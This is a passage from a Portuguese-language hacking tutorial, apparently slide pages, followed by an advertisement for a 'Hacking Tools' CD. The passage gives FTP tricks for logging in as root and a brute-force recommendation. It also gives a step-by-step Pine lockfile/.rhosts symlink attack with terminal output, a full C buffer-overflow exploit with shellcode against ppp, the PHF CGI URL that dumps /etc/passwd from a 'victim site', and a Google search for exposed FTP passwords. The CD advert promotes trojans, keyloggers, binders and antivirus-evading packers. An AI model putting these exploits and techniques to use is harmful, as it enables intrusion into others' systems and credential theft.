  28. 28. /usr/adm/loginlog Aqui ficam os Logs, horários de entradas e saídas dos usuários. As vazes podem estar em /usr/adm/acct/loginlog E as vezes nem é encontrado, alguns servidores desativam este serviço. /usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> : Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de ser o root ou o próprio usuário. /upload ou /cache/upload ou /cache/upload ou /cache/upload ou /cache Aqui ficam gravados arquivos temporários que os usuários ou mesmo o ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou a cada semana. Em muitos servers nao existe esse diretório. /bin :/bin :/bin :/bin : Neste diretório ficam os comandos do server e as shells. Cuidado. SENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITS Login anônimo user: anonymous pass: eu@dominio Logar como root (somente em servidores com falha) quote user ftp quote cwd ~root quote pass ftp quote user ftp quote cwd ~sys quote pass ftp quote user ftp quote cwd ~sysop quote pass ftp Diretorio das senhas : (As senhas estarão criptografadas) /etc/passwd .shadow (procure este diretório oculto)
  29. 29. Decriptografando uma senha Exemplo de senha criptografada: root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp Quebrando uma senha de FTP Quando você não pode acessar o arquivo passwd.txt e não consegue a senha criptogafada, significa que a segurança do servidor é muito boa ou você é muito ruim =) Ai só usando os métodos Lamer um deles é o Brute Force. Brute force significa “força bruta” existem vários programas de brute force, o funcionamento é simples, o programa gera inúmeras combinações de senhas até achar uma que logue. Você também pode usar uma “Word list” (uma lista com as senhas mais comuns) junto com o Bute Force. Um exemplo de programa é o Brutus Exploits UNIX Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é impossível você entender um exploiter se você não souber programar. Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te levando á root. Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile. hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
  30. 30. catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eaxn"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f" /* 16 bytes */ "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52" /* 16 bytes */ "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01" /* 20 bytes */ "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1);
  31. 31. execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root. Dicas de exploits em UNIX Estes são exploits usando comandos básicos de Unix, eu nem chamaria de exploits mas é legal para começar a estudar. Procurar por arquivos ocultos find / -name ".. " -print -xdev find / -name ".*" -print -xdev |cat -v Procurar por todos os diretórios com permissão de gravar (R) find / -perm -0777 -type -d -ls Procurando arquivos setuid no filesystem Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root find / -user root -perm -4000 -exec ls -ldb {} ; find / -perm -4000 find / -type f -perm -4000 -exec ls -l {} ; Procurar por todos os arquivos setgid no filesystem. find / -group root -perm -2000 -exec ls -ldb {} ; BUG de PHF Este exploit é muito antigo, muito dificio achar um servidor desatualizado. Basta colocar o exploit no seu navegador.Exploit: /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo: http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
  32. 32. Principais Falhas de FTP - Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas faciomente com um sniffer. - Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google consegue localizar estes arquivos, por exemplo: Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos. - Tem gente que ainda deixa root sem senha - Como os navegadores interagem com FTP, link de download direto, você pode invadir um FTP e “linkar” os arquivos para download, tipo: ftp://dominio/diretorios/arquivo Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar informação. Se quiserem entrar em contato comigo para tirar alguma dúvida: Email: rackerox@webexploiter.com MSN rackerox@hotmail.com Praga de Orkut: http://www.orkut.com/Profile.aspx?uid=4380671928865807152
  33. 33. CD ROOM HACKING TOOLS O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática. Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação, Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba senha com KL e invadir por cookies =) No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu funcionamento. Para comprar o CD entre no site: www.cdhackingtools.com Conteudo do CD: Redes/Internet -Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta -Programas para conexão remota ( com suporte para diferentes roteadores ) -Faça uma lista de todas as portas TCP e UDP abertas em seu computador. -Capture pacotes de IP contendo protocolos http em sua rede -Procure por pastas compartilhadas -Desligue um computador de rede local ou através da Internet. -Altere o seu endereço MAC -Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email. -Verifique o status de qualquer servidor na internet -Faça do seu computador um servidor de internet. -Capture todas as informações do tráfego de sua rede/conexão. -Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de wireless). -Deixe qualquer porta de seu computador em escuta e crie um log de texto. -Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser) -Mapeie qualquer porta de seu pc para outra maquina -Monitore qualquer servidor http, smtp, pop3 -Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp -Editor de cookies -E muito mais... são vários programas de snifers, scans, telnet, etc. Exploiters/Scans Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. Trojans Backdoors Um meio secreto ou não documentado de invadir um sistema de computador . Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma porta para um possível invasor. Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas operações no computador da vítima. Resumindo : Servidor é o vírus trojan que vai se instalar no pc da vítima Cliente é o programa que esta no seu pc E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP Keyloggers Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
  34. 34. Bruteforces (Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja encontrado.Ferramentas para força bruta em: - HTTP Basic Auth - HTTP Form - FTP - POP3 - TELNET - SMB (Netbios) - Custom IP Scans Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica. Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas portas. Faça scans até de IP que não respondem ao ping. Procure trojans instalados em uma determinada faixa de IP. Nuckers Nuke é o nome atribuído a programas que finalizam prematuramente com uma conexão TCP através do envio de pacotes ICMP com mensagens de erro. Tais pacotes podem ser direcionadas para o servidor (server side nuke) ou para o cliente (client side nuke). Tais programas tem a propriedade de terminar com a conexão fazendo com que o cliente ou o servidor sejam enganados por uma mensagem de erro que normalmente indicaria um problema de conexão entre os dois. Binders Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado Criptografia Programas de codificação e Decodificação de dados. Criptografia de arquivos em pastas, web ,dados,scripts etc. Programaçao O CD contem varias ferramentas de programação. Editores de HTML, PHP , Javascript, binary, hexadecimal. Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL Tradutor de Algoritmos. Programas para vc desenvolver o seu software. Gerador de programa de instalação etc. Compiladores Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em linguagem de máquina, gerando o binário que pode ser executado. No CD contem compiladores de C C++ Assesmbler Perl Resource Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode mudar caixas de diálogo, ícones e outras coisas. Conversores Corverta vários formatos de arquivo. De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash, conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.). Compressores Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o antivirus não detecte. Compactadores São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No cd contem os programas Winrar, Winzip e UPX
  35. 35. Ferramentas web Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc . Ferramentas windows Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco, manutenção do sistema, proteção de arquivos, etc. Vírus Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus Builders, arquivos de batch. Msn/orkut São mais de 70 programas para msn . Sniffers para capturar conversas de msn na sua rede Coloque o vídeo que vc quiser na imagem da sua webcan. Envie qualquer arquivo que o msn bloqueia. Programas de flood. Faça um log de todas as musicas que seu amigo ouviu. "Roube" as imagens de exibição, emotions, etc. dos seus contatos. Pegue o IP de seu amigo. Envie uma mensagem automática quando seu amigo fechar sua janela. Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de pesquisa E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery. Mais clientes de msn alem do windows messenger. Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery) Programas para orkut e mirc. Servidores Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet. O cd contem servidore de: Email, HTTP, FTP, DNS, PHP, SSH e PERL. Hospede seu site em seu próprio computador. Clientes Programas que acessam os serviços de um servidor. Telnet, SSH Segurança Programas para ajudar na sua segurança, não um kit de anti vírus. Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares, Monitore a segurança de seu computador à distancia. Crie um emulador de terminal Telnet e SSH. Ferramentas gerais Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan, gerenciador de uploads Mais Navegadoes: Firefox,Netscape,Opera e Safari Rode o Linux dentro do windows Sistemas operacionais Programas que rodam do pen drive Códigos fontes do: Secure Internet Communication Suíte. Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.) GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
  36. 36. EQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERS A Hall of Hackers foi criada em dezembro de 2006. Nosso intuito NÃO é promover nenhum tipo de prática maliciosa. O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall of Hackers somos inteiramente a favor da liberdade de informação. Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou seja, quem realmente estuda. Nossa comunidade http://www.orkut.com/Community.aspx?cmm=22006772 NOSSOS PROGETOS: Orkut Community Hall of Hackers CD Room de Softwares www.cdhackingtools.com Scan On Line www.webexploiter.com Blog Hacking http://insecuritynet.blogspot.com

×